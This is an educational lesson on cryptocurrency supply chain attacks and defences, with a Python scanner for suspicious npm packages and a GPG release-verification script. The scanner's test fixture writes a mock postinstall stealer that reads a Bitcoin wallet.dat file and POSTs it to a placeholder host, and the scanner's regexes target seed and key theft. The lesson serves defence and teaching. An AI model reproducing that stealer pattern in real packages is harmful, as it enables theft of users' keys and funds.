Supply Chain Attacks in Crypto
Lesson by Uvin Vindula
Supply chain attacks target the tools, software, and hardware you use to interact with Bitcoin rather than the Bitcoin protocol itself. They are among the most insidious threats because they subvert something you already trust: the compromised wallet or device behaves normally right up to the moment it leaks your keys or swaps an address, so there is usually no warning sign to detect.
Software Supply Chain Attacks
Bitcoin wallets, node software, and related tools are built from hundreds or thousands of software dependencies. An attacker who compromises a single dependency that ends up in a wallet's build can reach every user of that wallet:
- Compromised npm/PyPI packages: In 2022 and 2023, multiple malicious packages published to npm and PyPI specifically targeted cryptocurrency wallets. They typically ran at install time (an npm postinstall script, for example), scanned the machine for wallet files, seed phrases, and private keys, and sent them to an attacker-controlled server. Many were typosquats of popular package names, so a single mistyped dependency was enough to pull them in.
- Malicious browser extensions: Fake wallet extensions posing as MetaMask, Phantom, or other popular wallets are regularly uploaded to browser extension stores. They look and work like the real product, but the seed phrase or private key you enter to set them up is sent to the attacker.
- Compromised wallet software: Attackers have targeted the build and release systems of wallet projects, injecting code that substitutes the attacker's address for the wallet's generated receiving address. The wallet shows you something that looks like your address, but funds sent to it belong to the attacker. This is one reason to confirm a receiving address on a hardware wallet's own screen rather than trusting only the computer display.
- Update mechanism hijacking: Auto-update features in wallet software can be compromised (a hijacked update server or a stolen signing key), pushing malicious updates to legitimate users who never downloaded anything from an untrusted source.
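The install-time stealer pattern described above has a recognisable shape: a lifecycle hook that runs without the developer ever importing the package, code that reads wallet or seed material, and a network call to send it out. The following Python script is an added example (not code from the original lesson or from any named project) that audits an unpacked npm package directory for that shape. The indicator patterns, the package names and the collector URL are constructed for illustration and are not a vetted detection ruleset; a real audit would combine this with lockfile pinning, provenance checks and installing inside a sandbox.

```python
import json
import re
import tempfile
from pathlib import Path

# Illustrative indicator set (an assumption for this example, not a vetted ruleset).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SCANNED_SUFFIXES = (".js", ".mjs", ".cjs", ".py", ".sh", ".json")

INDICATORS = {
    # Well-known wallet storage locations and key-material names
    "wallet_file": re.compile(r"wallet\.dat|\.electrum|\.bitcoin|keystore", re.I),
    "seed_material": re.compile(r"seed[\s_-]?phrase|mnemonic|private[\s_-]?key|xprv", re.I),
    # Something to send the data out with
    "exfil": re.compile(r"\b(fetch|XMLHttpRequest|https?\.request|requests\.post|urllib)\b"),
    # Typical attempts to hide the payload from casual review
    "obfuscation": re.compile(r"\beval\s*\(|new Function\s*\(|atob\s*\(|b64decode\s*\("),
}


def find_lifecycle_hooks(pkg_dir):
    """npm runs these scripts automatically on `npm install`, which is exactly when a
    malicious package wants to execute without the developer ever importing it."""
    manifest = Path(pkg_dir) / "package.json"
    if not manifest.is_file():
        return {}
    scripts = json.loads(manifest.read_text()).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in LIFECYCLE_HOOKS}


def scan_for_indicators(pkg_dir):
    """Return (relative_path, indicator_name) pairs for every file matching a pattern."""
    pkg_dir = Path(pkg_dir)
    findings = []
    for path in sorted(pkg_dir.rglob("*")):
        if not path.is_file() or path.suffix not in SCANNED_SUFFIXES:
            continue
        text = path.read_text(errors="ignore")
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                findings.append((str(path.relative_to(pkg_dir)), name))
    return findings


def assess_package(pkg_dir):
    """Heuristic verdict: an install hook, plus access to key material, plus a network
    call in the same package is the characteristic shape of a wallet stealer."""
    hooks = find_lifecycle_hooks(pkg_dir)
    findings = scan_for_indicators(pkg_dir)
    kinds = {kind for _, kind in findings}
    steals_secrets = bool(kinds & {"wallet_file", "seed_material"})
    suspicious = bool(hooks) and steals_secrets and "exfil" in kinds
    return {"hooks": hooks, "findings": findings, "suspicious": suspicious}


def build_sample_packages(root):
    """Constructed fixtures: one benign helper and one that mimics the stealer shape."""
    root = Path(root)
    benign = root / "sats-format"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"name": "sats-format", "version": "2.1.0", "scripts": {"test": "node test.js"}}))
    (benign / "index.js").write_text("module.exports = s => `${s.toLocaleString()} sats`;\n")

    malicious = root / "fancy-wallet-utils"
    malicious.mkdir()
    (malicious / "package.json").write_text(json.dumps(
        {"name": "fancy-wallet-utils", "version": "1.0.3",
         "scripts": {"postinstall": "node setup.js", "test": "jest"}}))
    (malicious / "setup.js").write_text(
        "const fs = require('fs'), os = require('os'), path = require('path');\n"
        "const p = path.join(os.homedir(), '.bitcoin', 'wallet.dat');\n"
        "const data = fs.existsSync(p) ? fs.readFileSync(p).toString('base64') : '';\n"
        "fetch('https://collector.example.invalid/u', { method: 'POST', body: data });\n"
    )
    (malicious / "index.js").write_text("module.exports = require('./lib');\n")
    return benign, malicious


def demo():
    """Build both fixtures in a temporary directory and assess them."""
    with tempfile.TemporaryDirectory() as tmp:
        benign, malicious = build_sample_packages(tmp)
        return {"benign": assess_package(benign), "malicious": assess_package(malicious)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a package you have downloaded with `npm pack` (or `pip download`) and unpacked, before it ever runs an install hook on your machine. A hit on the heuristic is a reason to read the code by hand, not proof of malice; the absence of a hit is not proof of safety either, which is why the signature verification later in this lesson matters as much as scanning.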
Hardware Supply Chain Attacks
Physical devices can be compromised before they reach you:
- Modified hardware wallets: Fake or tampered Ledger, Trezor, and other hardware wallets are sold on unofficial marketplaces. These devices may come with a pre-generated seed phrase (already known to the attacker) or with modified firmware that leaks private keys.
- Evil maid attacks: An attacker with physical access to your hardware wallet or computer installs a keylogger, modified firmware, or a surveillance device while you are away, then waits for you to use the device as usual.
- Compromised manufacturing: In principle, an attacker could compromise the manufacturing or firmware-loading process of a hardware wallet vendor to insert a backdoor. This is one reason open-source, auditable designs (like SeedSigner, which you assemble yourself from off-the-shelf parts) are gaining popularity.
Verification Is Your Shield
The core defense against supply chain attacks is verification at every step:
- Verify software signatures: Bitcoin Core, Sparrow Wallet, and other reputable projects sign their releases with PGP/GPG keys (Bitcoin Core signs a SHA256SUMS file that covers every binary; Sparrow signs a release manifest the same way). Before installing, verify the signature and then check that the file you downloaded matches the signed checksum. A valid signature only proves something if it was made by the developer's real key, so obtain the signer's key fingerprint from a source independent of the download site and compare it; a signature from an unknown key that gpg reports as "good" proves nothing.
- Buy hardware wallets only from official sources: Do not buy from Amazon third-party sellers, eBay, or unofficial resellers. Purchase directly from the manufacturer (Ledger, Trezor, Coinkite for the ColdCard) or from a retailer the manufacturer lists as authorized.
- Check tamper-evident packaging: Vendors differ in what they ship, so learn what your device should look like. Coinkite ships the ColdCard in a numbered tamper-evident bag and the device displays that bag number on first boot; Trezor has used holographic seals; Ledger relies on a genuine-device check in Ledger Live rather than on a seal. Treat a sticker alone as weak evidence, since stickers can be copied, and use the vendor's own authenticity check where one exists.
- Generate your own seed: If a hardware wallet arrives with a seed phrase already written on the recovery card, it has been compromised: whoever prepared it can drain the wallet at any time. Do not use that device, even after a reset. Always generate a fresh seed on the device itself and write it down yourself.
- Use reproducible builds: Some wallet software (Bitcoin Core via its Guix build, and Sparrow) supports reproducible builds: anyone can compile the published source and obtain a byte-for-byte identical binary, so the hash of a release can be confirmed by independent builders rather than taken on trust. When several independent parties have attested to the same hash, a build-system compromise of the kind described above would have been noticed.
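The signature and checksum steps above are usually typed as two shell commands (`gpg --verify SHA256SUMS.asc SHA256SUMS`, then `sha256sum --ignore-missing --check SHA256SUMS`), and the mistake people make is stopping at "Good signature" without checking whose key made it. The following Python script is an added example, not code from Bitcoin Core, Sparrow or any other project, that performs both steps and pins the signer's fingerprint. The fingerprint in `PINNED_FINGERPRINTS`, the archive name and the manifest contents are constructed placeholders; substitute the real fingerprint you obtained out of band. The same digest comparison is what you use to check a locally reproduced build against the published release hash.

```python
import hashlib
import re
import subprocess
import tempfile
from pathlib import Path

# Hypothetical fingerprint for illustration only. In practice, pin the release
# signer's full 40-hex-digit fingerprint, obtained from a source independent of
# the download site (the project's repository, a previously verified copy, etc.).
PINNED_FINGERPRINTS = {"0123456789ABCDEF0123456789ABCDEF01234567"}

SUMS_LINE = re.compile(r"^([0-9a-fA-F]{64})\s+\*?(\S.*)$")


def parse_sha256sums(text):
    """Parse sha256sum-style lines ('<hex digest>  <filename>') into {filename: digest}."""
    entries = {}
    for line in text.splitlines():
        m = SUMS_LINE.match(line.strip())
        if m:
            entries[m.group(2)] = m.group(1).lower()
    return entries


def sha256_file(path):
    """Hash a file in chunks so large release archives need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def checksum_matches(binary_path, sums_text):
    """True only if the file is listed in the manifest AND its digest matches."""
    expected = parse_sha256sums(sums_text).get(Path(binary_path).name)
    return expected is not None and expected == sha256_file(binary_path)


def signature_is_trusted(gpg_status, pinned=PINNED_FINGERPRINTS):
    """Interpret `gpg --status-fd 1 --verify` output.

    A GOODSIG line only says the signature is valid for *some* key in your keyring;
    an attacker can sign a trojaned file with their own key. Trust only a VALIDSIG
    whose signing-key or primary-key fingerprint is one you pinned.
    """
    for line in gpg_status.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "[GNUPG:]" and parts[1] == "VALIDSIG":
            signing_fpr = parts[2].upper()
            primary_fpr = parts[-1].upper()  # last field is the primary key fingerprint
            if signing_fpr in pinned or primary_fpr in pinned:
                return True
    return False


def verify_release(binary_path, sums_path, sig_path, pinned=PINNED_FINGERPRINTS):
    """Full check: manifest signature from a pinned key, then digest of the binary.
    Requires gpg on PATH with the signer's public key already imported."""
    proc = subprocess.run(
        ["gpg", "--status-fd", "1", "--verify", str(sig_path), str(sums_path)],
        capture_output=True, text=True,
    )
    if not signature_is_trusted(proc.stdout, pinned):
        return False
    return checksum_matches(binary_path, Path(sums_path).read_text())


def demo_checksums():
    """Constructed data: a fake release archive, a matching manifest, a tampered copy
    and a file the manifest does not list at all."""
    with tempfile.TemporaryDirectory() as tmp:
        genuine = Path(tmp) / "wallet-1.0.0-linux-x86_64.tar.gz"
        genuine.write_bytes(b"genuine release bytes")
        sums = f"{sha256_file(genuine)}  {genuine.name}\n" + "0" * 64 + "  other-platform.dmg\n"
        tampered = Path(tmp) / "tampered" / genuine.name
        tampered.parent.mkdir()
        tampered.write_bytes(b"genuine release bytes" + b"\x00")
        unlisted = Path(tmp) / "wallet-1.0.0-windows.zip"
        unlisted.write_bytes(b"anything")
        return {
            "genuine": checksum_matches(genuine, sums),
            "tampered": checksum_matches(tampered, sums),
            "unlisted": checksum_matches(unlisted, sums),
        }


if __name__ == "__main__":
    print(demo_checksums())  # {'genuine': True, 'tampered': False, 'unlisted': False}
```

`verify_release` is the function you would call on a real download; it shells out to gpg, so it is not exercised by the self-contained demo. Note that `checksum_matches` deliberately fails when the filename is absent from the manifest: a manifest that omits the file you downloaded is itself a warning sign, not a pass.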
Sri Lanka Context
In Sri Lanka, where hardware wallets are not widely available in retail stores, many users order from international sellers or buy second-hand. This creates significant supply chain risk. Always order directly from manufacturers like Ledger (ledger.com) or Trezor (trezor.io) — even if shipping takes longer and costs more. The price of a compromised hardware wallet is not the LKR 25,000 you paid for it — it is every satoshi you store on it. Some Sri Lankan Bitcoin community groups maintain lists of verified purchase channels, which can be a useful resource for new users.
Key Takeaways
- Supply chain attacks compromise the tools and software you trust, not Bitcoin itself
- Malicious software dependencies, fake browser extensions, and compromised updates are major vectors
- Hardware wallets should only be purchased directly from manufacturers, never from third-party sellers
- Always verify software signatures (GPG) before installing wallet or node software
- If a hardware wallet arrives with a pre-filled seed phrase, it has been compromised
Quick Quiz
What is a supply chain attack in the crypto context?